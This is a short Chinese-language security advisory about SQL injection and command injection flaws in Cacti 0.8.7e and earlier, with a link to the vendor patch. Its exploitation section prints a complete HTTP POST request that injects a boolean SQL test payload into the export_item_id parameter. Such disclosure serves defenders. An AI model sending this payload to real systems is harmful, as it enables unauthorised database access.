Cacti SQL注入和命令注入漏洞

来源:岁月联盟 编辑:猪猪 时间:2010-04-25

影响版本:
Cacti <= 0.8.7e

程序介绍:

Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。

漏洞分析:

Cacti没有正确地过滤提交给templates_export.php页面的export_item_id参数便在SQL查询中使用,远程攻击者可以通过提交恶意请求执行SQL注入攻击;此外在添加或编辑设备时没有正确地过滤传送给主机名的输入,在添加或编辑图形目标时没有正确的过滤传送给垂直标签的输入,这可能导致注入并执行任意shell命令。

漏洞利用:

 

POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/cacti-0.8.7e/templates_export.php
Cookie: clickedFolder=tree_1%5Etree_1_leaf_7%5E; highlightedTreeviewLink=tree_1_leaf_7; 
Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
 
export_item_id=18 and 1=1&amp;include_deps=on&amp;output_format=3&amp;export_type=graph_template&amp;
save_component_export=1&amp;action=save&amp;x=24&amp;y=12



解决方案:
厂商补丁:
Cacti
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.cacti.net/downloads/patches/0.8.7e/sql_injection_template_export.patch